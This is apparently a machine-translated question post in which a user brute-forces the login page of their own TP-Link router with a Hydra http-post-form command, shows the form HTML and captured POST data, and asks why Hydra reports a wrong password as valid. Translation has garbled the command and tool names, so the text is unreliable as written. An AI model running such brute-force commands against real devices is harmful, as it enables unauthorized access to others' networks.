我设置为我的TPLINK路由器最简单的密码:aaaaaaac 默认用户是admin水润蛮力攻击我的家TPLINK路由器
我看着在页面的源代码,并发现这一点:
<FORM METHOD="POST" ACTION="/Forms/login_security_1" name="Login_Form"><p> </p>
<p> </p>
<table width="540" border="0" align=center cellpadding="0" cellspacing="0">
<tr>
<td><table width="100%" border="0" align=center cellpadding="0" cellspacing="0">
<tr>
<td height="31"> </td><td> </td><td> </td></tr><tr>
<td width="8%"> </td><td width="86%" valign=top>
<table width="86%" border="0" align=center>
<tr>
<td> </td><td> </td><td> </td></tr><tr>
<td align=center colspan=3 style="color:gray;font-family:Arial;text-align:left;margin:0px auto;font-size:14px;" id="tr1">
</td><INPUT TYPE="HIDDEN" NAME="tipsFlag" VALUE="0"><INPUT TYPE="HIDDEN" NAME="timevalue" VALUE="0"><SCRIPT language="JavaScript">
if(document.Login_Form.tipsFlag.value == 1){
var infoStr='The username or password is incorrect,please input again.';
document.getElementById("tr1").innerHTML = infoStr;
}else if(document.Login_Form.tipsFlag.value == 2){
timelast = document.Login_Form.timevalue.value;
window.setInterval("IncreaseSec()", 1000);
}
</SCRIPT>
</tr></table><table style="background-color:white" width="86%" border="0" align=center>
<tr>
<td height=35> </td><td> </td><td> </td></tr><tr>
<td align=right width=35%>
<FONT color=gray><b>
Username:</b></font>
</td><td><INPUT TYPE="TEXT" NAME="Login_Name" SIZE="12" MAXLENGTH="31" VALUE="" class="text" onfocus="changeBorderColor(this,1);" onblur="changeBorderColor(this,0);"></td></tr><tr>
<td height=5> </td><td> </td><td> </td></tr><tr>
<td align=right >
<FONT color=gray><b>
Password:</b></font>
</td><td><INPUT TYPE="PASSWORD" NAME="Login_Pwd" SIZE="12" MAXLENGTH="31" VALUE="" autocomplete="off" class="text" onfocus="changeBorderColor(this,1);" onblur="changeBorderColor(this,0);"></td></tr><tr>
<td align=center colspan=3>
<INPUT TYPE="BUTTON" NAME="texttpLoginBtn" VALUE="Login" class="LoginBtn" onClick="checkForm();"></td></tr><tr>
<td align=center colspan=3>
<INPUT TYPE="HIDDEN" NAME="uiWebLoginhiddenUsername" VALUE=""><INPUT TYPE="HIDDEN" NAME="uiWebLoginhiddenPassword" VALUE=""></td></tr><tr>
<td height="30" colspan="3" style="text-align:center;">
<label id="copyright" >
Copyright © 2014 TP-LINK Technologies Co., Ltd. All rights reserved.</label>
</td></tr></table></td><td width="6%"> </td></tr></table></td></tr></table><!-- RpZDT -->
</form><p> </p>
我还考察了POST源,发现:
tipsFlag = 0 & TIMEVALUE = 0 & LOGIN_NAME = 34 & Login_Pwd = Ha2S%2BeOKqmzA6nrlmTeh7w%3D%3D &ù iWebLoginhiddenUsername = e369853df766fa44e1ed0ff613f563bd & uiWebLoginhiddenPassword = e369853df766fa44e1ed0ff613f563bd
所以我攻击了我自己的路由器有这一行:
九头蛇-f -l管理员-x 8:8:一-V 192.168.1.1 HTTP-POST形式“/ login_security.html /表格/ login_security_1:tipsFlag = 0 & TIMEVALUE = 0 & LOGIN_NAME =^^ USER & Login_Pwd =^^ PASS & uiWebLoginhiddenUsername =^^ USER & uiWebLoginhiddenPassword =^^ PASS:坏”
水润成立错误的密码
[http-post-form] host:192.168.1.1登录名:admin密码:aaaaaaak [STATUS]攻击完成192.168.1.1(找到有效的对) 1 of 1 target successfully,1 valid发现密码
我在做什么错了?
aaaaaaak不起作用,但只有aaaaaaac - 我为实验设置的密码,以及在第三次尝试中水葫芦尝试的密码。 – MarioZ